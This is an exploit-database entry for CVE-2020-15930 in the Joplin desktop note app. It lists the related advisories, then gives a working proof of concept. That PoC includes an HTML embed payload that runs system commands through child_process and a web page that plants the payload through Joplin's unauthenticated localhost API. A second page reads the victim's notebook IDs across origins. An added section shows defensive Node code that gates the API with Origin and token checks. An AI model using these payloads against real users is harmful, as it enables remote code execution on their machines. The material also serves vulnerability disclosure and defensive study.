| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2020-15930 | 24 Sep 2020 18:41 | – | cve |
| CVE-2020-15930 | 24 Sep 2020 18:41 | – | cvelist |
| EUVD-2021-1044 | 7 Oct 2025 00:30 | – | euvd |
| Cross-site Scripting in Joplin | 7 May 2021 16:29 | – | github |
| CVE-2020-15930 | 24 Sep 2020 19:15 | – | nvd |
| GHSA-CGC7-MWP4-3CCX Cross-site Scripting in Joplin | 7 May 2021 16:29 | – | osv |
| Joplin 1.0.245 Cross Site Scripting / Code Execution | 28 Sep 2020 00:00 | – | packetstorm |
| Cross site scripting | 24 Sep 2020 19:15 | – | prion |

# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
# Version: 1.0.190 to 1.0.245
# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:
# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff
# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
# If the Joplin API is enabled, remote code execution with user interaction is possible by abusing the lack of required authentication on Joplin's 'POST /notes' API endpoint to remotely deploy the payload into the victim's application.
# 2. PoC
# Paste the following payload into a note:
<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">
# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.
<!-- exploit.html -->
<script>
x = new XMLHttpRequest;
j = {
  title: "CVE-2020-15930",
  body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
};
x.open("POST", "http://127.0.0.1:41184/notes");
x.send(JSON.stringify(j));
</script>
# To create a note in another notebook you need the notebook ID. The victim's notebook IDs can be obtained because of a relaxed CORS policy on the 'GET /folders' endpoint.
<!-- notebooks.html -->
<script>
x = new XMLHttpRequest();
x.onreadystatechange = function() {
  if (x.readyState == XMLHttpRequest.DONE) {
    alert(x.responseText);
  }
}
x.open('GET', 'http://127.0.0.1:41184/folders');
x.send();
</script>
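
The delivery step in 2.1 works because the XHR POST is a "simple" cross-origin request (string body, default text/plain content type), so the browser sends it without a preflight and the unauthenticated endpoint accepts it. The following is an added example, not part of the original PoC and not Joplin's own code, of a request gate for a localhost API that refuses both that write and the cross-origin read of 'GET /folders'; TOKEN, ALLOWED_ORIGINS, gate() and the `token` query parameter are assumptions made for the illustration.

```javascript
// Added example (not Joplin's code). TOKEN, ALLOWED_ORIGINS and gate() are hypothetical.
const { randomBytes, timingSafeEqual } = require("crypto");

const TOKEN = randomBytes(32).toString("hex"); // per-install secret the user copies into clients
const ALLOWED_ORIGINS = new Set();             // no web origin is trusted by default

function tokenMatches(supplied) {
  const a = Buffer.from(String(supplied || ""));
  const b = Buffer.from(TOKEN);
  return a.length === b.length && timingSafeEqual(a, b);
}

// req: { method, url, headers } shaped like Node's http.IncomingMessage
// (header names lower-cased). Returns the status and CORS headers to send.
function gate(req) {
  const headers = {};
  const origin = req.headers.origin;
  // Browsers attach Origin to cross-site XHR/fetch, including "simple" POSTs
  // that skip the preflight. Refuse any origin that was not explicitly allowed,
  // and never answer with Access-Control-Allow-Origin: *.
  if (origin !== undefined) {
    if (!ALLOWED_ORIGINS.has(origin)) return { status: 403, headers };
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Vary"] = "Origin";
  }
  // Every method and path needs the token, reads included.
  const supplied = new URL(req.url, "http://127.0.0.1").searchParams.get("token");
  if (!tokenMatches(supplied)) return { status: 401, headers };
  return { status: 200, headers };
}

// Constructed sample requests, not captured traffic.
const SAMPLES = [
  { method: "POST", url: "/notes", headers: { origin: "http://untrusted.example" } },
  { method: "GET", url: "/folders", headers: { origin: "null" } }, // page opened from file://
  { method: "POST", url: "/notes", headers: {} },                  // local client, no token
  { method: "POST", url: `/notes?token=${TOKEN}`, headers: {} },   // local client, valid token
];

function sampleStatuses() {
  return SAMPLES.map((req) => gate(req).status);
}

console.log(sampleStatuses().join(" "));
```

The Origin check stops requests issued by web pages; the token check covers clients that send no Origin header at all, so neither check replaces the other.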